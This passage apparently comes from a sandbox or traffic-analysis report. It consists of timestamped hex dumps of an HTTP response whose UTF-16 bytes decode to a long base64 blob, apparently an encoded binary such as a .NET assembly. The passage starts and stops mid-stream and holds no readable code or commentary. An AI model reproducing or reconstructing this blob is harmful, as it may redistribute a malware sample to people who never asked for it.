                                                                                                                                                                                                  Data Ascii: YUFBQUJKZER1QUFBRUtEY0FBQXB6T0FBQUNpaHVBQUFLQW5zUUFBQUVFUW9SRFZnUkRoYVdXQkVPRjVaWUVRNFlsbGdSRGhtV1dHa1JEaHFXYVcveUFBQUtmU2dBQUF
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC104INData Raw: 46 00 52 00 51 00 55 00 46 00 42 00 62 00 6e 00 4e 00 51 00 51 00 55 00 46 00 42 00 52 00 55 00 59 00 79 00 62 00 33 00 70 00 58 00 64 00 30 00 6f 00 33 00 52 00 6b 00 46 00 42 00 51 00 55 00 4a 00 42 00 59 00 30 00 6c 00 58 00 53 00 54 00 68 00 33 00 51 00 55 00 46 00 42 00 51 00 32 00 56 00 35 00 61 00 30 00 46 00 42 00 51 00 56 00 46 00 53 00 52 00 48 00 67 00 34 00 54 00 57 00 70 00 57 00 62 00 30 00 46 00 42 00 51 00 55 00 56 00 73 00 4d 00 45 00 38 00 30 00 51 00 55 00 46 00 42 00 55 00 57 00 39 00 4f 00 64 00 30 00 46 00 42 00 51 00 32 00 35 00 4e 00 4e 00 45 00 46 00 42 00 51 00 55 00 74 00 4c 00 52 00 7a 00 52 00 42 00 51 00 55 00 46 00 76 00 51 00 32 00 56 00 34 00 51 00 55 00 46 00 42 00 51 00 56 00 46 00 53 00 51 00 6d 00 68 00 46 00 53 00 6c
                                                                                                                                                                                                  Data Ascii: FRQUFBbnNQQUFBRUYyb3pXd0o3RkFBQUJBY0lXSTh3QUFBQ2V5a0FBQVFSRHg4TWpWb0FBQUVsME80QUFBUW9Od0FBQ25NNEFBQUtLRzRBQUFvQ2V4QUFBQVFSQmhFSl
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC108INData Raw: 00 32 00 4e 00 46 00 55 00 56 00 6c 00 57 00 56 00 30 00 4a 00 4e 00 52 00 30 00 56 00 52 00 57 00 55 00 52 00 4d 00 4e 00 47 00 4e 00 48 00 52 00 6d 00 6c 00 71 00 4e 00 30 00 46 00 42 00 51 00 55 00 74 00 46 00 64 00 32 00 5a 00 6c 00 51 00 6e 00 6c 00 5a 00 56 00 32 00 46 00 6f 00 54 00 55 00 67 00 7a 00 5a 00 30 00 46 00 53 00 51 00 6e 00 6c 00 76 00 51 00 6b 00 56 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 56 00 42 00 79 00 4e 00 6b 00 46 00 42 00 59 00 30 00 74 00 42 00 51 00 55 00 46 00 43 00 53 00 6d 00 64 00 4a 00 57 00 47 00 46 00 73 00 4f 00 46 00 68 00 68 00 64 00 6a 00 52 00 43 00 53 00 32 00 64 00 42 00 51 00 55 00 56 00 36 00 51 00 55 00 4e 00 42 00 51 00 58 00 64 00 42 00 51 00 55 00 46 00 42 00 4e 00 30 00 46 00 42 00
                                                                                                                                                                                                  Data Ascii: 2NFUVlWV0JNR0VRWURMNGNHRmlqN0FBQUtFd2ZlQnlZV2FoTUgzZ0FSQnlvQkVBQUFBQUFBQVByNkFBY0tBQUFCSmdJWGFsOFhhdjRCS2dBQUV6QUNBQXdBQUFBN0FB
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC112INData Raw: 69 00 64 00 33 00 4e 00 42 00 51 00 55 00 46 00 79 00 59 00 30 00 4a 00 70 00 64 00 30 00 64 00 43 00 62 00 54 00 68 00 4d 00 51 00 55 00 46 00 42 00 53 00 7a 00 4e 00 4f 00 4e 00 45 00 52 00 4b 00 64 00 44 00 52 00 42 00 52 00 6b 00 4e 00 76 00 53 00 55 00 74 00 6e 00 51 00 55 00 46 00 42 00 51 00 55 00 56 00 76 00 51 00 55 00 46 00 42 00 51 00 30 00 46 00 44 00 54 00 55 00 46 00 44 00 55 00 33 00 64 00 42 00 51 00 32 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 42 00 51 00 6b 00 6c 00 42 00 53 00 6b 00 52 00 5a 00 51 00 55 00 4e 00 6e 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 56 00 46 00 72 00 53 00 55 00 46 00 42 00 64 00 32 00 39 00 42 00 51 00 55 00 46 00 47 00 59 00 55 00 46 00 30 00 51 00 58 00 6c
                                                                                                                                                                                                  Data Ascii: id3NBQUFyY0Jpd0dCbThMQUFBSzNONERKdDRBRkNvSUtnQUFBQUVvQUFBQ0FDTUFDU3dBQ2dBQUFBQUNBQklBSkRZQUNnQUFBQUFBQUFBQVFrSUFBd29BQUFGYUF0QXl
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC116INData Raw: 00 46 00 43 00 51 00 55 00 46 00 43 00 65 00 57 00 4a 00 6e 00 4d 00 45 00 46 00 6a 00 51 00 6c 00 52 00 52 00 53 00 6b 00 46 00 42 00 51 00 55 00 46 00 70 00 61 00 54 00 5a 00 42 00 51 00 55 00 46 00 4c 00 52 00 32 00 38 00 79 00 54 00 6b 00 46 00 42 00 51 00 55 00 4a 00 4b 00 55 00 6c 00 6c 00 59 00 52 00 6b 00 4e 00 70 00 4b 00 30 00 46 00 42 00 51 00 55 00 74 00 76 00 61 00 56 00 56 00 59 00 52 00 6e 00 68 00 52 00 62 00 33 00 5a 00 6e 00 51 00 55 00 46 00 44 00 63 00 55 00 6c 00 73 00 52 00 30 00 4a 00 6a 00 56 00 55 00 74 00 4d 00 4e 00 45 00 46 00 42 00 51 00 58 00 46 00 70 00 53 00 6c 00 4a 00 72 00 56 00 30 00 5a 00 44 00 61 00 53 00 74 00 42 00 51 00 55 00 46 00 4c 00 62 00 32 00 6c 00 70 00 4c 00 30 00 46 00 42 00 51 00 55 00 74 00 4c 00 52 00
                                                                                                                                                                                                  Data Ascii: FCQUFCeWJnMEFjQlRRSkFBQUFpaTZBQUFLR28yTkFBQUJKUllYRkNpK0FBQUtvaVVYRnhRb3ZnQUFDcUlsR0JjVUtMNEFBQXFpSlJrV0ZDaStBQUFLb2lpL0FBQUtLR
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC120INData Raw: 52 00 47 00 64 00 43 00 64 00 32 00 49 00 7a 00 59 00 30 00 4a 00 42 00 51 00 57 00 39 00 76 00 5a 00 55 00 46 00 46 00 51 00 55 00 4e 00 74 00 4b 00 31 00 52 00 42 00 55 00 55 00 46 00 48 00 53 00 6c 00 4a 00 61 00 64 00 6d 00 78 00 52 00 52 00 55 00 46 00 43 00 62 00 53 00 39 00 4a 00 51 00 55 00 46 00 42 00 53 00 7a 00 4e 00 6e 00 54 00 57 00 30 00 7a 00 5a 00 30 00 46 00 4b 00 59 00 6a 00 4e 00 72 00 51 00 6b 00 46 00 42 00 62 00 33 00 52 00 77 00 64 00 44 00 52 00 4c 00 51 00 31 00 4e 00 33 00 52 00 30 00 4e 00 58 00 4f 00 45 00 78 00 42 00 51 00 55 00 46 00 4c 00 4d 00 30 00 34 00 30 00 53 00 30 00 4e 00 44 00 64 00 30 00 64 00 44 00 52 00 7a 00 68 00 4d 00 51 00 55 00 46 00 42 00 53 00 7a 00 4e 00 4f 00 4e 00 45 00 74 00 43 00 65 00 58 00 64 00 48
                                                                                                                                                                                                  Data Ascii: RGdCd2IzY0JBQW9vZUFFQUNtK1RBUUFHSlJadmxRRUFCbS9JQUFBSzNnTW0zZ0FKYjNrQkFBb3RwdDRLQ1N3R0NXOExBQUFLM040S0NDd0dDRzhMQUFBSzNONEtCeXdH
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC124INData Raw: 00 6e 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 6b 00 64 00 30 00 56 00 42 00 51 00 32 00 6c 00 56 00 64 00 45 00 4a 00 44 00 57 00 56 00 56 00 4c 00 64 00 31 00 5a 00 32 00 61 00 47 00 64 00 42 00 51 00 55 00 4e 00 78 00 53 00 57 00 38 00 32 00 51 00 55 00 46 00 42 00 51 00 32 00 30 00 76 00 56 00 45 00 46 00 42 00 51 00 55 00 73 00 7a 00 5a 00 30 00 31 00 74 00 4d 00 32 00 64 00 42 00 53 00 6d 00 49 00 7a 00 61 00 30 00 4a 00 42 00 51 00 57 00 38 00 32 00 51 00 56 00 41 00 76 00 4c 00 79 00 38 00 35 00 4e 00 45 00 74 00 44 00 55 00 33 00 64 00 48 00 51 00 31 00 63 00 34 00 54 00 45 00 46 00 42 00 51 00 55 00 73 00 7a 00 54 00 6a 00 52 00 4c 00 51 00 30 00 4e 00 33 00 52 00 30 00 4e 00 48 00 4f 00 45 00 78 00 42 00 51 00 55 00 46 00 4c 00 4d 00 30 00
                                                                                                                                                                                                  Data Ascii: nQUFBcHZkd0VBQ2lVdEJDWVVLd1Z2aGdBQUNxSW82QUFBQ20vVEFBQUszZ01tM2dBSmIza0JBQW82QVAvLy85NEtDU3dHQ1c4TEFBQUszTjRLQ0N3R0NHOExBQUFLM0
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC128INData Raw: 55 00 46 00 45 00 4e 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 64 00 30 00 46 00 42 00 51 00 55 00 46 00 76 00 51 00 55 00 46 00 42 00 52 00 55 00 4e 00 42 00 51 00 55 00 46 00 42 00 62 00 55 00 46 00 42 00 51 00 55 00 46 00 48 00 4f 00 45 00 46 00 42 00 51 00 55 00 46 00 49 00 51 00 56 00 46 00 42 00 51 00 55 00 52 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 30 00 46 00 42 00 51 00 55 00 46 00 71 00 64 00 30 00 46 00 42 00 51 00 55 00 6c 00 5a 00 51 00 55 00 46 00 42 00 51 00 56 00 5a 00 42 00 55 00 55 00 46 00 42 00 52 00 45 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 44 00 51 00 55 00 46 00 42 00 51 00 57 00 68 00 6e 00 51 00 55 00 46 00 42 00 53 00 6a 00 42 00 42 00 51
                                                                                                                                                                                                  Data Ascii: UFENUFBQUFBd0FBQUFvQUFBRUNBQUFBbUFBQUFHOEFBQUFIQVFBQURBQUFBQUFBQUFBQ0FBQUFqd0FBQUlZQUFBQVZBUUFBREFBQUFBQUFBQUFDQUFBQWhnQUFBSjBBQ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC132INData Raw: 00 4d 00 55 00 46 00 52 00 51 00 55 00 74 00 45 00 56 00 47 00 6c 00 4e 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 58 00 4f 00 54 00 4a 00 42 00 55 00 55 00 46 00 4c 00 5a 00 45 00 55 00 77 00 51 00 55 00 46 00 42 00 52 00 56 00 52 00 43 00 51 00 6b 00 56 00 46 00 53 00 48 00 68 00 68 00 54 00 6c 00 64 00 6e 00 51 00 55 00 46 00 42 00 55 00 31 00 68 00 52 00 4d 00 57 00 64 00 42 00 51 00 55 00 4a 00 44 00 5a 00 7a 00 4e 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 6b 00 64 00 30 00 56 00 42 00 51 00 32 00 6c 00 70 00 53 00 30 00 46 00 52 00 51 00 55 00 74 00 4b 00 55 00 30 00 31 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 31 00 46 00 52 00 52 00 6d 00 39 00 55 00 51 00 6c 00 4e 00
                                                                                                                                                                                                  Data Ascii: MUFRQUtEVGlNQUFBQUNXOTJBUUFLZEUwQUFBRVRCQkVFSHhhTldnQUFBU1hRMWdBQUJDZzNBQUFLY3pnQUFBcHZkd0VBQ2lpS0FRQUtKU01BQUFBQUFBQ1FRRm9UQlN
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC136INData Raw: 4a 00 44 00 5a 00 7a 00 4e 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 63 00 57 00 6c 00 47 00 4d 00 6a 00 6c 00 4e 00 51 00 55 00 46 00 42 00 53 00 30 00 59 00 31 00 62 00 31 00 68 00 71 00 56 00 6d 00 39 00 42 00 51 00 55 00 46 00 46 00 62 00 45 00 5a 00 6f 00 4f 00 57 00 4e 00 75 00 55 00 6d 00 52 00 32 00 57 00 6e 00 64 00 42 00 51 00 55 00 4e 00 6f 00 59 00 57 00 46 00 44 00 64 00 44 00 52 00 4b 00 53 00 6e 00 51 00 30 00 51 00 57 00 5a 00 6f 00 4e 00 45 00 46 00 42 00 51 00 57 00 39 00 78 00 51 00 6d 00 6c 00 76 00 51 00 55 00 46 00 42 00 52 00 56 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 56 00 42 00 36 00 4f 00 45 00 46 00 42 00 64 00 32 00 39 00 42 00 51 00 55 00 46 00 46 00 59 00 6b
                                                                                                                                                                                                  Data Ascii: JDZzNBQUFLY3pnQUFBcWlGMjlNQUFBS0Y1b1hqVm9BQUFFbEZoOWNuUmR2WndBQUNoYWFDdDRKSnQ0QWZoNEFBQW9xQmlvQUFBRVFBQUFBQUFBQVB6OEFBd29BQUFFYk
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC140INData Raw: 00 55 00 74 00 4c 00 53 00 6c 00 56 00 43 00 51 00 55 00 46 00 76 00 63 00 30 00 4e 00 33 00 53 00 6a 00 64 00 53 00 64 00 30 00 46 00 42 00 51 00 6b 00 4e 00 6f 00 65 00 55 00 46 00 42 00 51 00 55 00 74 00 42 00 62 00 6e 00 52 00 47 00 51 00 55 00 46 00 42 00 52 00 57 00 5a 00 75 00 55 00 55 00 46 00 42 00 51 00 57 00 39 00 76 00 62 00 46 00 46 00 46 00 51 00 55 00 4e 00 70 00 64 00 30 00 78 00 42 00 62 00 6e 00 52 00 47 00 51 00 55 00 46 00 42 00 52 00 55 00 74 00 49 00 53 00 55 00 46 00 42 00 51 00 57 00 39 00 44 00 5a 00 54 00 42 00 72 00 51 00 55 00 46 00 42 00 55 00 69 00 74 00 6b 00 51 00 55 00 46 00 42 00 51 00 32 00 6c 00 70 00 56 00 6b 00 46 00 52 00 51 00 55 00 74 00 4d 00 51 00 58 00 4e 00 44 00 5a 00 54 00 42 00 72 00 51 00 55 00 46 00 42 00
                                                                                                                                                                                                  Data Ascii: UtLSlVCQUFvc0N3SjdSd0FBQkNoeUFBQUtBbnRGQUFBRWZuUUFBQW9vbFFFQUNpd0xBbnRGQUFBRUtISUFBQW9DZTBrQUFBUitkQUFBQ2lpVkFRQUtMQXNDZTBrQUFB
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC144INData Raw: 4c 00 61 00 55 00 6c 00 44 00 51 00 54 00 4d 00 79 00 55 00 55 00 46 00 42 00 51 00 55 00 56 00 4c 00 61 00 44 00 52 00 44 00 5a 00 54 00 56 00 46 00 51 00 55 00 46 00 42 00 55 00 58 00 46 00 4a 00 5a 00 30 00 6c 00 45 00 5a 00 6c 00 70 00 46 00 51 00 55 00 46 00 42 00 55 00 58 00 46 00 49 00 5a 00 30 00 6f 00 33 00 61 00 32 00 64 00 42 00 51 00 55 00 4a 00 44 00 62 00 32 00 6c 00 42 00 5a 00 30 00 34 00 35 00 61 00 32 00 64 00 42 00 51 00 55 00 4a 00 44 00 62 00 32 00 56 00 42 00 62 00 6e 00 56 00 55 00 51 00 55 00 46 00 42 00 52 00 55 00 74 00 70 00 53 00 55 00 4e 00 42 00 4d 00 7a 00 4a 00 55 00 51 00 55 00 46 00 42 00 52 00 55 00 74 00 6f 00 4e 00 45 00 4e 00 6c 00 4e 00 56 00 46 00 42 00 51 00 55 00 46 00 52 00 63 00 55 00 6c 00 6e 00 53 00 55 00 52
                                                                                                                                                                                                  Data Ascii: LaUlDQTMyUUFBQUVLaDRDZTVFQUFBUXFJZ0lEZlpFQUFBUXFIZ0o3a2dBQUJDb2lBZ045a2dBQUJDb2VBbnVUQUFBRUtpSUNBMzJUQUFBRUtoNENlNVFBQUFRcUlnSUR
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC148INData Raw: 00 46 00 4c 00 54 00 45 00 46 00 4a 00 57 00 45 00 74 00 6e 00 59 00 31 00 68 00 58 00 51 00 58 00 4e 00 49 00 51 00 6d 00 38 00 31 00 63 00 45 00 31 00 31 00 53 00 56 00 64 00 4c 00 61 00 54 00 56 00 36 00 53 00 46 00 46 00 4a 00 51 00 55 00 4a 00 76 00 51 00 56 00 42 00 42 00 55 00 55 00 46 00 46 00 53 00 32 00 67 00 30 00 51 00 30 00 74 00 48 00 53 00 55 00 46 00 42 00 51 00 57 00 39 00 78 00 53 00 32 00 64 00 4f 00 64 00 6b 00 70 00 52 00 52 00 55 00 46 00 43 00 61 00 46 00 51 00 72 00 51 00 58 00 6c 00 76 00 5a 00 55 00 45 00 79 00 4f 00 47 00 78 00 42 00 55 00 55 00 46 00 48 00 53 00 32 00 6b 00 31 00 65 00 6b 00 6c 00 52 00 53 00 55 00 46 00 43 00 62 00 30 00 46 00 61 00 51 00 56 00 46 00 42 00 52 00 55 00 74 00 6f 00 4e 00 45 00 4e 00 4c 00 52 00
                                                                                                                                                                                                  Data Ascii: FLTEFJWEtnY1hXQXNIQm81cE11SVdLaTV6SFFJQUJvQVBBUUFFS2g0Q0tHSUFBQW9xS2dOdkpRRUFCaFQrQXlvZUEyOGxBUUFHS2k1eklRSUFCb0FaQVFBRUtoNENLR
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC152INData Raw: 53 00 7a 00 4a 00 30 00 51 00 30 00 4a 00 6e 00 51 00 31 00 52 00 4d 00 4d 00 47 00 39 00 30 00 51 00 6d 00 64 00 43 00 61 00 45 00 31 00 6b 00 54 00 58 00 4a 00 43 00 5a 00 30 00 45 00 35 00 51 00 6d 00 52 00 4e 00 63 00 6b 00 4a 00 6e 00 51 00 56 00 4e 00 43 00 54 00 33 00 64 00 61 00 51 00 6d 00 64 00 43 00 51 00 6b 00 68 00 30 00 54 00 58 00 4a 00 48 00 5a 00 30 00 4e 00 54 00 53 00 32 00 52 00 4e 00 63 00 6b 00 5a 00 6e 00 51 00 57 00 74 00 53 00 54 00 30 00 46 00 78 00 52 00 6d 00 64 00 45 00 55 00 45 00 31 00 42 00 5a 00 7a 00 56 00 47 00 5a 00 30 00 4e 00 32 00 54 00 79 00 74 00 42 00 63 00 55 00 5a 00 6e 00 51 00 54 00 4a 00 43 00 54 00 30 00 46 00 78 00 52 00 6d 00 64 00 45 00 63 00 56 00 46 00 31 00 51 00 58 00 46 00 47 00 5a 00 30 00 51 00 79
                                                                                                                                                                                                  Data Ascii: SzJ0Q0JnQ1RMMG90QmdCaE1kTXJCZ0E5QmRNckJnQVNCT3daQmdCQkh0TXJHZ0NTS2RNckZnQWtST0FxRmdEUE1BZzVGZ0N2TytBcUZnQTJCT0FxRmdEcVF1QXFGZ0Qy
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC156INData Raw: 00 42 00 51 00 55 00 74 00 52 00 51 00 58 00 6c 00 42 00 51 00 7a 00 68 00 43 00 51 00 56 00 46 00 42 00 55 00 55 00 46 00 44 00 64 00 30 00 52 00 42 00 51 00 55 00 46 00 77 00 51 00 55 00 52 00 72 00 51 00 56 00 42 00 33 00 52 00 55 00 4a 00 42 00 51 00 6b 00 46 00 42 00 4d 00 6d 00 64 00 52 00 51 00 55 00 46 00 44 00 61 00 30 00 46 00 51 00 55 00 55 00 4a 00 4a 00 51 00 56 00 46 00 72 00 51 00 6b 00 56 00 42 00 52 00 45 00 5a 00 48 00 51 00 55 00 46 00 42 00 56 00 31 00 46 00 47 00 51 00 55 00 46 00 46 00 4f 00 45 00 4a 00 44 00 55 00 55 00 56 00 52 00 51 00 55 00 52 00 6e 00 57 00 6b 00 46 00 42 00 51 00 6c 00 70 00 42 00 56 00 54 00 52 00 42 00 56 00 57 00 64 00 46 00 53 00 6b 00 46 00 53 00 51 00 55 00 45 00 32 00 65 00 47 00 64 00 42 00 51 00 55 00
                                                                                                                                                                                                  Data Ascii: BQUtRQXlBQzhCQVFBUUFDd0RBQUFwQURrQVB3RUJBQkFBMmdRQUFDa0FQUUJJQVFrQkVBREZHQUFBV1FGQUFFOEJDUUVRQURnWkFBQlpBVTRBVWdFSkFSQUE2eGdBQU
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC160INData Raw: 58 00 64 00 46 00 51 00 55 00 46 00 48 00 4f 00 45 00 35 00 42 00 51 00 55 00 4a 00 61 00 51 00 56 00 49 00 34 00 51 00 6b 00 74 00 42 00 53 00 56 00 52 00 42 00 55 00 55 00 46 00 42 00 4e 00 6c 00 45 00 34 00 51 00 55 00 46 00 47 00 61 00 30 00 4a 00 49 00 64 00 30 00 56 00 76 00 51 00 57 00 68 00 4e 00 51 00 6b 00 46 00 42 00 51 00 6d 00 74 00 43 00 51 00 55 00 46 00 42 00 56 00 31 00 46 00 46 00 5a 00 6b 00 46 00 54 00 5a 00 30 00 4e 00 46 00 64 00 30 00 56 00 42 00 51 00 55 00 56 00 42 00 53 00 6b 00 46 00 42 00 51 00 6c 00 70 00 42 00 55 00 6a 00 68 00 43 00 53 00 30 00 46 00 4a 00 56 00 45 00 46 00 52 00 51 00 55 00 46 00 44 00 55 00 57 00 39 00 42 00 51 00 55 00 5a 00 72 00 51 00 6b 00 68 00 33 00 52 00 57 00 39 00 42 00 61 00 45 00 31 00 43 00 51
                                                                                                                                                                                                  Data Ascii: XdFQUFHOE5BQUJaQVI4QktBSVRBUUFBNlE4QUFGa0JId0VvQWhNQkFBQmtCQUFBV1FFZkFTZ0NFd0VBQUVBSkFBQlpBUjhCS0FJVEFRQUFDUW9BQUZrQkh3RW9BaE1CQ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC164INData Raw: 00 51 00 6b 00 56 00 50 00 51 00 56 00 4a 00 4e 00 64 00 30 00 56 00 42 00 52 00 6a 00 68 00 6a 00 55 00 6b 00 31 00 33 00 52 00 58 00 6c 00 46 00 63 00 6b 00 31 00 53 00 54 00 58 00 64 00 49 00 4c 00 30 00 56 00 31 00 56 00 56 00 4a 00 4e 00 64 00 30 00 63 00 32 00 51 00 6a 00 5a 00 52 00 55 00 6b 00 31 00 33 00 52 00 6e 00 4e 00 43 00 59 00 57 00 74 00 53 00 54 00 58 00 64 00 49 00 5a 00 6b 00 4e 00 50 00 62 00 31 00 4a 00 4e 00 64 00 30 00 64 00 72 00 52 00 6a 00 68 00 6a 00 55 00 6b 00 31 00 33 00 52 00 58 00 70 00 47 00 63 00 6b 00 31 00 53 00 54 00 58 00 64 00 48 00 52 00 55 00 56 00 77 00 56 00 56 00 4a 00 4e 00 64 00 30 00 68 00 4e 00 52 00 58 00 6c 00 52 00 55 00 6b 00 31 00 33 00 53 00 48 00 5a 00 47 00 54 00 30 00 46 00 53 00 54 00 58 00 64 00
                                                                                                                                                                                                  Data Ascii: QkVPQVJNd0VBRjhjUk13RXlFck1STXdIL0V1VVJNd0c2QjZRUk13RnNCYWtSTXdIZkNPb1JNd0drRjhjUk13RXpGck1STXdHRUVwVVJNd0hNRXlRUk13SHZGT0FSTXd
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC168INData Raw: 46 00 4b 00 57 00 55 00 46 00 35 00 61 00 47 00 73 00 35 00 52 00 6b 00 56 00 33 00 51 00 56 00 52 00 45 00 4d 00 45 00 46 00 42 00 51 00 55 00 46 00 42 00 62 00 47 00 64 00 44 00 4e 00 30 00 74 00 44 00 61 00 30 00 52 00 55 00 64 00 30 00 4e 00 46 00 55 00 46 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 31 00 4a 00 42 00 52 00 32 00 39 00 76 00 55 00 30 00 4a 00 53 00 55 00 55 00 46 00 47 00 51 00 53 00 74 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 70 00 5a 00 51 00 56 00 46 00 55 00 55 00 47 00 6c 00 42 00 52 00 6b 00 56 00 42 00 62 00 32 00 6f 00 30 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 72 00 55 00 55 00 4e 00 51 00 51 00 32 00 6c 00 72 00 52 00 46 00 56 00 33 00 51 00 7a 00 64 00 51 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 44 00 55 00 6b
                                                                                                                                                                                                  Data Ascii: FKWUF5aGs5RkV3QVREMEFBQUFBbGdDN0tDa0RUd0NFUFFBQUFBQ1JBR29vU0JSUUFGQStBQUFBQUpZQVFUUGlBRkVBb2o0QUFBQUFrUUNQQ2lrRFV3QzdQZ0FBQUFDUk
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC172INData Raw: 00 55 00 46 00 73 00 5a 00 30 00 4a 00 79 00 53 00 58 00 59 00 30 00 56 00 54 00 68 00 52 00 52 00 46 00 4a 00 58 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 44 00 56 00 30 00 46 00 50 00 62 00 30 00 63 00 76 00 61 00 46 00 51 00 77 00 51 00 55 00 39 00 34 00 57 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 6c 00 6c 00 42 00 56 00 58 00 70 00 55 00 4b 00 30 00 5a 00 51 00 59 00 30 00 46 00 54 00 52 00 6d 00 74 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 78 00 6e 00 51 00 6b 00 68 00 43 00 4c 00 7a 00 52 00 56 00 4b 00 32 00 64 00 43 00 64 00 56 00 64 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 58 00 51 00 55 00 73 00 30 00 5a 00 43 00 39 00 6f 00 56 00 44 00 6c 00 42 00 53 00 6d 00 68 00 61 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4b 00
                                                                                                                                                                                                  Data Ascii: UFsZ0JySXY0VThRRFJXQUFBQUFDV0FPb0cvaFQwQU94WUFBQUFBSllBVXpUK0ZQY0FTRmtBQUFBQWxnQkhCLzRVK2dCdVdRQUFBQUNXQUs0ZC9oVDlBSmhaQUFBQUFK
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC176INData Raw: 00 45 00 4e 00 76 00 56 00 31 00 52 00 33 00 53 00 47 00 39 00 6f 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 44 00 56 00 30 00 46 00 45 00 51 00 58 00 46 00 4e 00 61 00 46 00 70 00 53 00 51 00 56 00 64 00 31 00 53 00 45 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 6c 00 6c 00 4a 00 5a 00 46 00 4a 00 6e 00 4e 00 55 00 5a 00 73 00 53 00 55 00 4a 00 74 00 53 00 57 00 4e 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 78 00 6e 00 51 00 69 00 74 00 48 00 52 00 44 00 68 00 58 00 56 00 57 00 64 00 49 00 57 00 57 00 68 00 33 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 58 00 51 00 55 00 6c 00 6a 00 57 00 54 00 5a 00 6e 00 4d 00 56 00 52 00 42 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 44 00 51 00 55 00 46 00 4b 00 52 00 57 00 64 00 5a 00 56 00 48 00 42 00 48 00
                                                                                                                                                                                                  Data Ascii: ENvV1R3SG9oZ0FBQUFDV0FEQXFNaFpSQVd1SEFBQUFBSllJZFJnNUZsSUJtSWNBQUFBQWxnQitHRDhXVWdIWWh3QUFBQUNXQUljWTZnMVRBUUFBQUFDQUFKRWdZVHBH
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC180INData Raw: 34 00 52 00 55 00 56 00 42 00 51 00 30 00 35 00 42 00 59 00 55 00 39 00 6f 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4a 00 57 00 55 00 6b 00 77 00 5a 00 32 00 4a 00 4b 00 51 00 55 00 6b 00 30 00 51 00 6e 00 45 00 32 00 52 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 61 00 47 00 64 00 71 00 59 00 55 00 4a 00 6f 00 51 00 55 00 46 00 71 00 5a 00 30 00 63 00 77 00 62 00 31 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 30 00 64 00 44 00 54 00 46 00 56 00 4a 00 65 00 6c 00 4a 00 68 00 55 00 45 00 46 00 69 00 65 00 57 00 68 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 6c 00 5a 00 53 00 58 00 5a 00 52 00 61 00 6c 00 68 00 47 00 62 00 7a 00 68 00 43 00 65 00 47 00 46 00 46 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 6f 00 5a 00 32 00 64 00 55 00 51 00 79 00 74
                                                                                                                                                                                                  Data Ascii: 4RUVBQ05BYU9oQUFBQUFJWUkwZ2JKQUk0QnE2RUFBQUFBaGdqYUJoQUFqZ0cwb1FBQUFBQ0dDTFVJelJhUEFieWhBQUFBQUlZSXZRalhGbzhCeGFFQUFBQUFoZ2dUQyt
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC184INData Raw: 00 4e 00 42 00 65 00 45 00 64 00 47 00 4e 00 32 00 74 00 43 00 56 00 6d 00 46 00 5a 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 6f 00 5a 00 32 00 6b 00 30 00 52 00 45 00 5a 00 42 00 57 00 48 00 56 00 52 00 52 00 6d 00 56 00 77 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 44 00 52 00 30 00 4e 00 43 00 53 00 55 00 39 00 58 00 65 00 47 00 55 00 32 00 51 00 56 00 64 00 68 00 62 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 56 00 6c 00 4a 00 52 00 32 00 63 00 31 00 62 00 45 00 59 00 33 00 62 00 30 00 4a 00 69 00 4e 00 6c 00 6c 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 68 00 6e 00 61 00 6e 00 42 00 45 00 62 00 6b 00 46 00 59 00 64 00 58 00 64 00 47 00 4d 00 33 00 42 00 